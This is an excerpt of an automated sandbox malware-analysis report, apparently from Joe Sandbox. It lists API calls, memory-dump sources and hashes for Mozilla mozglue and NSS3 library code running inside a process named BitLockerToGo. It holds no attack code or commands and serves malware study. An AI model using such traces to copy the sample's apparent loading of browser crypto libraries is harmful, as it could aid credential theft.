                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B850A
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B851E
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B855B
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B856F
                                                                                                                                                                                                                                                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B85AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B767F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B7693
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B76A7
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B85B2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA8C1B
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 6CAA8C34
                                                                                                                                                                                                                                                                                                                    • PL_ArenaAllocate.NSS3 ref: 6CAA8C65
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA8C9C
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA8CB6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                                                    • String ID: KRAM
                                                                                                                                                                                                                                                                                                                    • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: GetCurrentProcess.KERNEL32(?,6C9731A7), ref: 6C9ACBF1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9731A7), ref: 6C9ACBFA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C984A68), ref: 6C9B945E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9B9470
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9B9482
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: __Init_thread_footer.LIBCMT ref: 6C9B949F
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BF619
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9BF598), ref: 6C9BF621
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9B94EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9B9508
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BF637
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8,?,?,00000000,?,6C9BF598), ref: 6C9BF645
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8,?,?,00000000,?,6C9BF598), ref: 6C9BF663
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9BF62A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                                    • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3 ref: 6CBA2CA0
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3 ref: 6CBA2CBE
                                                                                                                                                                                                                                                                                                                    • calloc.MOZGLUE(00000001,00000014), ref: 6CBA2CD1
                                                                                                                                                                                                                                                                                                                    • strdup.MOZGLUE(?), ref: 6CBA2CE1
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CBA2D27
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • Loaded library %s (static lib), xrefs: 6CBA2D22
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                                                    • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                                                    • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4cc7ee4d16f412c2df3e4de241e82ae79f99e877987e1cd41a0a4e21e0fa4df
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9a09d6f250a5ec468009de6095d586b37a4e8689ce7f1a065278a6d37418047c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4cc7ee4d16f412c2df3e4de241e82ae79f99e877987e1cd41a0a4e21e0fa4df
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91108B5605290AFEB008F66E844A6A77B4EB4531DF08843DD85DC7B41E731D849CBA3
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C9ACFAE,?,?,?,6C9731A7), ref: 6C9B05FB
                                                                                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C9ACFAE,?,?,?,6C9731A7), ref: 6C9B0616
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C9731A7), ref: 6C9B061C
                                                                                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C9731A7), ref: 6C9B0627
                                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _writestrlen
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                    • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 325b404f78acc21caa98b213e5675cf81ac4f497423f0f75ecbe74a2cd92528a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7844444a59932de2b5884e9c994a6715db79140094284863444f6376008a74d1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 325b404f78acc21caa98b213e5675cf81ac4f497423f0f75ecbe74a2cd92528a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3E08CE2A0101037F614225ABC86DBB7A1CDBEA134F08003AFD0D82702E94AED1A51F6
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CAFED6B
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000000), ref: 6CAFEDCE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: malloc.MOZGLUE(6CAE8D2D,?,00000000,?), ref: 6CAF0BF8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: TlsGetValue.KERNEL32(6CAE8D2D,?,00000000,?), ref: 6CAF0C15
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,6CAFB04F), ref: 6CAFEE46
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAFEECA
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CAFEEEA
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CAFEEFB
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3768380896-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f6f3b77fcb316ead307241371bbbc16fa61ca5d98f640f2a7d6ba61ab6c27bb6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 46523f9e71bdd3726be41f4f66b2d4f2a9ada53d03b48e76c1a22b44b842bdbd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6f3b77fcb316ead307241371bbbc16fa61ca5d98f640f2a7d6ba61ab6c27bb6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B817EB1A002059FEB14CF59DD80AAB77F5BF88308F18442CF92597B51D735E89ACBA1
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
APIs
• GetCurrentThreadId.KERNEL32 ref: 6C9D14C5
• ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9D14E2
• GetCurrentThreadId.KERNEL32 ref: 6C9D1546
• InitializeConditionVariable.KERNEL32(?), ref: 6C9D15BA
• free.MOZGLUE(?), ref: 6C9D16B4
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
• String ID:
• API String ID: 1909280232-0
APIs
  • Part of subcall function 6CAFC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CAFDAE2,?), ref: 6CAFC6C2
• PR_Now.NSS3 ref: 6CAFCD35
  • Part of subcall function 6CB59DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DC6
  • Part of subcall function 6CB59DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DD1
  • Part of subcall function 6CB59DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB59DED
  • Part of subcall function 6CAE6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C3F
• PR_GetCurrentThread.NSS3 ref: 6CAFCD54
  • Part of subcall function 6CB59BF0: TlsGetValue.KERNEL32(?,?,?,6CBA0A75), ref: 6CB59C07
  • Part of subcall function 6CAE7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA91CCC,00000000,00000000,?,?), ref: 6CAE729F
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAFCD9B
• PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CAFCE0B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CAFCE2C
  • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
  • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
  • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
  • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
  • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
• PORT_ArenaMark_Util.NSS3(00000000), ref: 6CAFCE40
  • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
  • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
  • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
  • Part of subcall function 6CAFCEE0: PORT_ArenaMark_Util.NSS3(?,6CAFCD93,?), ref: 6CAFCEEE
  • Part of subcall function 6CAFCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CAFCD93,?), ref: 6CAFCEFC
  • Part of subcall function 6CAFCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CAFCD93,?), ref: 6CAFCF0B
  • Part of subcall function 6CAFCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CAFCD93,?), ref: 6CAFCF1D
  • Part of subcall function 6CAFCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF47
  • Part of subcall function 6CAFCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF67
  • Part of subcall function 6CAFCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CAFCD93,?,?,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF78
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
• String ID:
• API String ID: 3748922049-0
APIs
• PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CACEF38
  • Part of subcall function 6CAB9520: PK11_IsLoggedIn.NSS3(00000000,?,6CAE379E,?,00000001,?), ref: 6CAB9542
• PK11_Authenticate.NSS3(?,00000001,?), ref: 6CACEF53
  • Part of subcall function 6CAD4C20: TlsGetValue.KERNEL32 ref: 6CAD4C4C
  • Part of subcall function 6CAD4C20: EnterCriticalSection.KERNEL32(?), ref: 6CAD4C60
  • Part of subcall function 6CAD4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CA1
  • Part of subcall function 6CAD4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CBE
  • Part of subcall function 6CAD4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CD2
  • Part of subcall function 6CAD4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4D3A
• PR_GetCurrentThread.NSS3 ref: 6CACEF9E
  • Part of subcall function 6CB59BF0: TlsGetValue.KERNEL32(?,?,?,6CBA0A75), ref: 6CB59C07
• free.MOZGLUE(00000000), ref: 6CACEFC3
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6CACF016
• free.MOZGLUE(00000000), ref: 6CACF022
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2459274275-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a7698cbb72851f78f6f859cdd229767a8a1a0c56a68406b9788e924248cb5bb6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d86a4ca23d0b86415deb699c74d1949b2a672692d6658cf1ece5c75ad0f546f0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7698cbb72851f78f6f859cdd229767a8a1a0c56a68406b9788e924248cb5bb6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841A471E00109AFDF018FA9DC85BEE7BB9AF48358F044029F914A7351E771D959CBA2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CDC60
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C9CD38A,?), ref: 6C9CDC6F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C9CD38A,?), ref: 6C9CDCC1
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C9CD38A,?), ref: 6C9CDCE9
                                                                                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C9CD38A,?), ref: 6C9CDD05
                                                                                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C9CD38A,?), ref: 6C9CDD4A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 45a6940e3428aa192a66aa76f27f8da943297986cc86e6172bcd2464c528f7ed
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5828c1aac01d1c883a4e80d75941807ee0d80036e85b920a80877f186498fb59
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a6940e3428aa192a66aa76f27f8da943297986cc86e6172bcd2464c528f7ed
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76417CB6B00605DFCB00CF99C88099AB7F5FF99314B654569D946ABB10EB31FC00CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CERT_DecodeAVAValue.NSS3(?,?,6CA90A2C), ref: 6CA90E0F
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CA90A2C), ref: 6CA90E73
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CA90A2C), ref: 6CA90E85
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000001,?,?,6CA90A2C), ref: 6CA90E90
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CA90EC4
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CA90A2C), ref: 6CA90ED9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
